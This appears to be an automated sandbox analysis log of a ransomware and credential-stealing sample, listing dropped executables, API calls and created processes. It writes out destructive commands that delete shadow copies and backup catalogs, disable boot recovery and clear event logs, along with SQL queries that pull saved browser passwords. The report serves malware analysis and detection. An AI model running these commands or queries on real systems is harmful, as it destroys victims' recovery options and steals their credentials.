Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64140 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, | 1_2_00D64140 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001D60 GetFileAttributesA,GetTempPathA,GetTempFileNameA,CopyFileA,CryptUnprotectData,HeapAlloc,LocalFree,HeapFree,DeleteFileA, | 2_2_10001D60 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100010C0 StrStrIW,lstrlenW,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,wsprintfA,wsprintfA,CryptDestroyHash,CryptReleaseContext, | 2_2_100010C0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10001200 StrStrIW,lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,LocalFree, | 2_2_10001200 |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quietC:\Windows\system32\cmd.exeWinSta0\Defaulto |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quieth |
Source: cmd.exe | Binary or memory string: ? c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: cmd.exe | Binary or memory string: ?c:\Windows\system32\vssadmin.exe delete shadows /all /quiettemn |
Source: cmd.exe | Binary or memory string: 9C:\Windows\system32\cmd.exe/cc:\Windows\system32\vssadmin.exedeleteshadows/all/quietESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\A(0 |
Source: vssadmin.exe | Binary or memory string: Lc:\Windows\system32\vssadmin.exedeleteshadows/all/quiet, |
Source: vssadmin.exe | Binary or memory string: c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: vssadmin.exe | Binary or memory string: C:\Users\user\Desktop\c:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quietc:\Windows\system32\vssadmin.exe delete shadows /all /quietWinSta0\Default |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C: |
Source: vssadmin.exe | Binary or memory string: vssadmin Delete Shadows |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest |
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D: |
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: unknown | DNS traffic detected: queries for: 252.0.0.224.in-addr.arpa |
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3 |
Source: yegus.exe | String found in binary or memory: file:///C:/jbxinitvm.au3s |
Source: yegus.exe | String found in binary or memory: http://certs.starfieldtech.com/repository/1402 |
Source: yegus.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q |
Source: yegus.exe | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0 |
Source: yegus.exe | String found in binary or memory: http://crl.thawte.com/ThawtePCA-G3.crl0 |
Source: yegus.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0= |
Source: yegus.exe | String found in binary or memory: http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$ |
Source: yegus.exe | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0? |
Source: yegus.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: yegus.exe | String found in binary or memory: http://ocsp.digicert.com0K |
Source: yegus.exe | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0: |
Source: yegus.exe | String found in binary or memory: http://ocsp.thawte.com0 |
Source: yegus.exe | String found in binary or memory: http://s.symcb.com/pca3-g5.crl0 |
Source: yegus.exe | String found in binary or memory: http://s.symcd.com0_ |
Source: yegus.exe | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0/ |
Source: yegus.exe | String found in binary or memory: http://t2.symcb.com0A |
Source: winlogon.exe, _wjg.exe.1.dr | String found in binary or memory: http://www.sysinternals.com |
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/cps0% |
Source: yegus.exe | String found in binary or memory: https://d.symcb.com/rpa0 |
Source: yegus.exe | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps0) |
Source: yegus.exe | String found in binary or memory: https://www.thawte.com/cps07 |
Source: unknown | DNS traffic detected: query: 252.0.0.224.in-addr.arpa replaycode: Name error (3) |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100114D0 LoadLibraryW,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc, | 3_2_100114D0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: \Google\Chrome\User Data\Default\Login Data | 2_2_10001FB0 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\logins.json |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\ucngw.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe |
Source: winlogon.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: _usm.exe | Binary or memory string: bcdedit.exe |
Source: _usm.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: cmd.exe | Binary or memory string: 'Abcdedit.exeV |
Source: cmd.exe | Binary or memory string: 'Cbcdedit.exe |
Source: cmd.exe | Binary or memory string: bcdedit.exe |
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe |
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit.exe*} |
Source: cmd.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures B |
Source: cmd.exe | Binary or memory string: 1C:\Windows\system32\bcdedit.exe\??\C:\Windows\system32\bcdedit.exe |
Source: cmd.exe | Binary or memory string: >C:\Windows\system32\cmd.exe/cbcdedit.exe/set{default}bootstatuspolicyignoreallfailures&bcdedit/set{default}recoveryenablednoamFiles=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\HERBBL~1\AppData\Local\TempTMP=C:\Users\HERBBL~1\AppData\Local\TempUSERDOMAIN=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BV |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exe |
Source: cmd.exe | Binary or memory string: InternalNamebcdedit.exe |
Source: cmd.exe | Binary or memory string: OriginalFilenamebcdedit.exej% |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktopbcdedit.exeB |
Source: cmd.exe | Binary or memory string: indows\system32\bcdedit.exe.0\7 |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\bcdedit.exeath\bcdedit*B |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noC:\Windows\system32\cmd.exeWinSta0\Defaultf |
Source: cmd.exe | Binary or memory string: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled noa |
Source: cmd.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bC:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled nodWinSta0\Default=C:=C:\Users\user\Desktop=ExitCode=00000000=Z:=Z:\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDENTIFIER=x |
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd( |
Source: bcdedit.exe | Binary or memory string: @bcdedit.exe/set{default}bootstatuspolicyignoreallfailuresackburnLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C: |
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures WinSta0\Default |
Source: bcdedit.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;## |
Source: bcdedit.exe | Binary or memory string: bcdedit.exeBC:\Users\user\Desktop\ |
Source: bcdedit.exe | Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled nobcdedit /set {default} recoveryenabled noWinSta0\Defaulti |
Source: bcdedit.exe | Binary or memory string: hj4`=\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;## |
Source: _usm.exe.1.dr | Binary or memory string: C:\Windows\system32\cmd.exe /c%s %s %sServicesActive%s\*...SeShutdownPrivilegec:\Windows\system32\vssadmin.exedelete shadows /all /quietwbadmin.exedelete catalog -quietbcdedit.exe/set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled nowevtutil.execl Systemcl SecurityH |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath, | 1_2_00D643A0 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B696 push ecx; ret | 1_2_00D6B6A9 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013348F6 push ecx; ret | 2_2_01334909 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083436 push ecx; ret | 2_2_10083449 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51CE6 push ecx; ret | 3_2_00C51CF9 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001966 push ecx; ret | 3_2_10001979 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00142CC5 push ecx; ret | 4_2_00142CD8 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW, | 1_2_00D75F8F |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW, | 2_2_01339A82 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA, | 2_2_10088620 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW, | 3_2_00C5850A |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA, | 3_2_10008EEC |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose, | 4_2_00141441 |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\wbengine.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: winlogon.exe | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console |
Source: _wjg.exe.1.dr | String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console |
Source: winlogon.exe | Static file information: File size 1861632 > 1048576 |
Source: winlogon.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x195c00 |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: winlogon.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: winlogon.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: | Binary string: KERBEROS.pdb source: ucngw.exe |
Source: | Binary string: msv1_0.pdb source: ucngw.exe |
Source: | Binary string: lsasrv.pdb source: ucngw.exe |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: winlogon.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: _wjg.exe.1.dr | Binary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\Srv2\Device\LanmanServerSeTcbPrivilege"%s" %sNetIsServiceAccountnetapi32.dll_SA_{262E99C9-6160-4871-ACEC-4E61736B6F21}NT AUTHORITYNT SERVICECreateRestrictedTokenwinsta0Winlogondefaultwinsta0\winlogonwinsta0\defaultWow64DisableWow64FsRedirectionKernel32.dll%s.exefailed to readsecure: %d |
Source: _wjg.exe.1.dr | Binary string: Sysinternals RocksRtlNtStatusToDosErrorntdll.dllRtlInitUnicodeStringNtOpenFileNtFsControlFile\Device\LanmanRedirector\%s\ipc$Use PsKill to terminate the remotely running program. |
Source: classification engine | Classification label: mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D62B90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle, | 1_2_00D62B90 |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013335E0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle, | 2_2_013335E0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61A30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetTokenInformation,LookupPrivilegeNameW,AdjustTokenPrivileges,CloseHandle, | 3_2_00C61A30 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001416E9 Wow64DisableWow64FsRedirection,LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,Wow64RevertWow64FsRedirection,CreateThread,Sleep,InitiateSystemShutdownExW,ExitProcess, | 4_2_001416E9 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D64C30 CoInitializeEx,CoInitializeSecurity,CredUIParseUserNameW,LocalAlloc,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysStringLen,SysStringLen,SysStringLen,SysStringLen,CoCreateInstance,SysFreeString,wsprintfW,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoSetProxyBlanket,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysAllocString,GetModuleFileNameW,CreateFileW,GetFileSize,SafeArrayCreate,SafeArrayAccessData,ReadFile,SafeArrayUnaccessData,CloseHandle,CloseHandle,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,LocalFree,CoUninitialize, | 1_2_00D64C30 |
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AAD0 GetModuleHandleW,FindResourceW,LoadResource,LockResource,SizeofResource, | 1_2_00D6AAD0 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001412E8 OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle, | 4_2_001412E8 |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\Public\A9E5CC701A2E98F9114060D6645A7A5B |
Source: C:\Users\user\Desktop\winlogon.exe | File created: C:\Users\HERBBL~1\AppData\Local\Temp\yegus.exe |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Command line argument: <NULL> | 2_2_013338C0 |
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Command line argument: <NULL> | 3_2_00C61EC0 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wbadmin.exe | 4_2_001416E9 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: bcdedit.exe | 4_2_001416E9 |
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wevtutil.exe | 4_2_001416E9 |
Source: winlogon.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini |
Source: C:\Users\user\Desktop\winlogon.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;`R |
Source: yegus.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s; |
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins; |
Source: yegus.exe | Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins; |
Source: yegus.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q); |
Source: yegus.exe | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); |
Source: yegus.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s; |
Source: unknown | Process created: C:\Users\user\Desktop\winlogon.exe 'C:\Users\user\Desktop\winlogon.exe' |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464 |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet |
Source: unknown | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet |
Source: unknown | Process created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe |
Source: unknown | Process created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding |
Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System |
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security |
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security |
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0 |
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe unknown |
